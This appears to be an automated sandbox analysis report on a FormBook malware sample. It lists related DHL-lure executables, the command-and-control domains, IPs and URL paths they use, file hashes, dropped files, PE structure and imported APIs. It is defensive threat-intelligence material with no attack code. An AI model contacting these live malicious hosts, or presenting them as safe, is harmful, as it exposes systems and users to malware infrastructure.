Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
91.195.240.94	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
	236236236.elf	Get hash	malicious	Unknown	Browse	suboyule.736t.com/
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	www.rssnewscast.com/fo8o/
154.215.72.110	wOoESPII08.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
	N2sgk6jMa2.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
	Document 151-512024.exe	Get hash	malicious	FormBook	Browse	www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
www.3xfootball.com	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	154.215.72.110

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
POWERLINE-AS-APPOWERLINEDATACENTERHK	psibx9rXra.exe	Get hash	malicious	FormBook	Browse	156.242.132.82
	OVZizpEU7Q.exe	Get hash	malicious	FormBook	Browse	156.251.17.224
	cbot.exe	Get hash	malicious	Unknown	Browse	154.213.192.42
	cbot.exe	Get hash	malicious	Unknown	Browse	154.213.192.42
	NWPZbNcRxL.exe	Get hash	malicious	FormBook	Browse	154.213.39.66
	armv4l.elf	Get hash	malicious	Unknown	Browse	156.253.200.172
	https://199.188.109.181	Get hash	malicious	Unknown	Browse	154.203.26.164
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	156.243.249.53
	sora.arm7.elf	Get hash	malicious	Unknown	Browse	154.216.35.228
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	154.215.72.110
REGISTER-ASIT	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 40312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
	DHL 30312052024.exe	Get hash	malicious	FormBook	Browse	195.110.124.133
SEDO-ASDE	zE1VxVoZ3W.exe	Get hash	malicious	FormBook	Browse	91.195.240.123
	DHL-DOC83972025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	http://thehalobun.com/	Get hash	malicious	HTMLPhisher	Browse	91.195.240.19
	BP-50C26_20241220_082241.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	rDHL8350232025-2.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 8350232025-1.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 745-12302024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 806-232024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 0737-12182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94
	DHL 073412182024.exe	Get hash	malicious	FormBook	Browse	91.195.240.94

Process:	C:\Windows\SysWOW64\netbtugc.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1209886597424439
Encrypted:	false
SSDEEP:	192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8QbnVcxjONC4Je5Q:r2qOB1nxCkvSAELyKOMq+8QTQKC+
MD5:	EFD26666EAE0E87B32082FF52F9F4C5E
SHA1:	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0
SHA-256:	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
SHA-512:	28ADD7B8D88795F191567FD029E9F8BC9AEF7584CE3CD56DB40BBA52BC8335F2D8E53A5CE44C153C13A31FD0BE1D76D1E558A4AA5987D5456C000C4D64F08EAA
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\aut6A46.tmp

Download File

Process:	C:\Users\user\Desktop\WBI835q8qr.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.989470148458725
Encrypted:	false
SSDEEP:	6144:ybZDHyq6Dev5JcrvGE1F/5Oc3jKcv6KF6RbV+XCBEbvonym4R3yzm0jQS:2WD+cr+E1F/8on6KFmV+oGgnZ4REmon
MD5:	7B00E56945F669D2F6B03E6054C840B0
SHA1:	DE5E6FD5146B8A477FFA5789BA1CCE9DA7AB0431
SHA-256:	1E64B38BA0671291A07302A5DE55BACE64ED8CAA777F1CFC2220D8F33FFC83FD
SHA-512:	9A4EAF6548B093C7AC5BF9DD075116C89841FD4E7FDCA637958829F67706A915B70C70C10A2B701A038B8DCA5D6589EEAF978FC90FAAADC97973B79E667531D7
Malicious:	false
Reputation:	low
Preview:	.....ACR0..K..x.A@...lQJ...FDVACR0ADRBCFDFDVACR0ADRBCFDFD.ACR>^.\B.O.g.W..sd)-!b34+!67,c1Q/*=6c$!f6#/c;^a...c++"!xLNX.ADRBCFD?E_.~2W.y2%.{$!.L...!#.X..z$1.Y...x2%..-%,k!$.0ADRBCFD..VA.S1A.:..FDFDVACR.AFSIBMDFTRACR0ADRBC.QFDVQCR0a@RBC.DFTVACP0ABRBCFDFDPACR0ADRBcBDFFVACR0AFR..FDVDVQCR0ATRBSFDFDVASR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRl7#<2DVA.]4ADBBCFTBDVQCR0ADRBCFDFDVAcR0!DRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVA

C:\Users\user\AppData\Local\Temp\ectosphere

Download File

Process:	C:\Users\user\Desktop\WBI835q8qr.exe
File Type:	data
Category:	dropped
Size (bytes):	270848
Entropy (8bit):	7.989470148458725
Encrypted:	false
SSDEEP:	6144:ybZDHyq6Dev5JcrvGE1F/5Oc3jKcv6KF6RbV+XCBEbvonym4R3yzm0jQS:2WD+cr+E1F/8on6KFmV+oGgnZ4REmon
MD5:	7B00E56945F669D2F6B03E6054C840B0
SHA1:	DE5E6FD5146B8A477FFA5789BA1CCE9DA7AB0431
SHA-256:	1E64B38BA0671291A07302A5DE55BACE64ED8CAA777F1CFC2220D8F33FFC83FD
SHA-512:	9A4EAF6548B093C7AC5BF9DD075116C89841FD4E7FDCA637958829F67706A915B70C70C10A2B701A038B8DCA5D6589EEAF978FC90FAAADC97973B79E667531D7
Malicious:	false
Reputation:	low
Preview:	.....ACR0..K..x.A@...lQJ...FDVACR0ADRBCFDFDVACR0ADRBCFDFD.ACR>^.\B.O.g.W..sd)-!b34+!67,c1Q/*=6c$!f6#/c;^a...c++"!xLNX.ADRBCFD?E_.~2W.y2%.{$!.L...!#.X..z$1.Y...x2%..-%,k!$.0ADRBCFD..VA.S1A.:..FDFDVACR.AFSIBMDFTRACR0ADRBC.QFDVQCR0a@RBC.DFTVACP0ABRBCFDFDPACR0ADRBcBDFFVACR0AFR..FDVDVQCR0ATRBSFDFDVASR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRl7#<2DVA.]4ADBBCFTBDVQCR0ADRBCFDFDVAcR0!DRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVACR0ADRBCFDFDVA

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.175547323996424
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	WBI835q8qr.exe
File size:	1'195'008 bytes
MD5:	eb30426f7e258e040ada0dafdfabaef8
SHA1:	6c759779d47c2e69a14accbc07cb252f1a1a39b7
SHA256:	075cbf8b84def7244b1e0b5e759b7ac367a015c40a2d127c730cfb5f39c5a040
SHA512:	86b7584f29385427036ce0a9615321bee03fcff0b9794a05521c7352a0b12b881ba2adfe846a3733429d8a754de4a61df2bfde1debadcf0033f609b98bdc80fd
SSDEEP:	24576:+u6J33O0c+JY5UZ+XC0kGso6Fao8DhGWM7CmjgaBab/WY:Qu0c++OCvkGs9Faomh/cjgaB9Y
TLSH:	E945CF2273DDC360CB669173BF2AB7016EBF7C610630B95B2F980D7DA950162162D7A3
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......6...r}..r}..r}..4,".p}......s}.../..A}.../#..}.../".G}..{.@.{}..{.P.W}..r}..R.....)."}......s}.../..s}..r}T.s}......s}..Richr}.

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x427dcd
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x674FA6E9 [Wed Dec 4 00:48:41 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	afcdf79be1557326c854b6e20cb900a7

Entrypoint Preview

Instruction
call 00007F773182E5EAh
jmp 00007F77318213B4h
int3
int3
int3
int3
int3
int3
int3
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007F773182153Ah
cmp edi, eax
jc 00007F773182189Eh
bt dword ptr [004C31FCh], 01h
jnc 00007F7731821539h
rep movsb
jmp 00007F773182184Ch
cmp ecx, 00000080h
jc 00007F7731821704h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007F7731821540h
bt dword ptr [004BE324h], 01h
jc 00007F7731821A10h
bt dword ptr [004C31FCh], 00000000h
jnc 00007F77318216DDh
test edi, 00000003h
jne 00007F77318216EEh
test esi, 00000003h
jne 00007F77318216CDh
bt edi, 02h
jnc 00007F773182153Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007F7731821543h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007F7731821595h
bt esi, 03h
jnc 00007F77318215E8h

Rich Headers

Programming Language:

[ASM] VS2013 build 21005
[ C ] VS2013 build 21005
[C++] VS2013 build 21005
[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2013 UPD4 build 31101
[RES] VS2013 build 21005
[LNK] VS2013 UPD4 build 31101

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xba44c	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc7000	0x5b2b4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x123000	0x711c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x92bc0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xa4870	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8f000	0x884	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8dcc4	0x8de00	d28a820a1d9ff26cda02d12b888ba4b4	False	0.5728679102422908	data	6.676118058520316	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8f000	0x2e10e	0x2e200	79b14b254506b0dbc8cd0ad67fb70ad9	False	0.33535526761517614	OpenPGP Public Key	5.76010872795207	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xbe000	0x8f74	0x5200	9f9d6f746f1a415a63de45f8b7983d33	False	0.1017530487804878	data	1.198745897703538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc7000	0x5b2b4	0x5b400	c8441299069e4ea338496450f633dc2e	False	0.927763805650685	data	7.8940043369734925	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x123000	0x711c	0x7200	6fcae3cbbf6bfbabf5ec5bbe7cf612c3	False	0.7650767543859649	data	6.779031650454199	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc75a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc76d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc77f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc7920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc7c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc7d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc8bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc9480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc99e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xcbf90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xcd038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xcd4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xcd4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcda84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xce110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xce5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xceb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcf1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcf660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcf7b8	0x5257b	data			1.0003291082944186
RT_GROUP_ICON	0x121d34	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0x121dac	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0x121dc0	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0x121dd4	0x14	data	English	Great Britain	1.25
RT_VERSION	0x121de8	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0x121ec4	0x3ef	ASCII text, with CRLF line terminators	English	Great Britain	0.5074478649453823

Imports

DLL	Import
WSOCK32.dll	WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll	GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll	AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll	StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll	GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll	GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
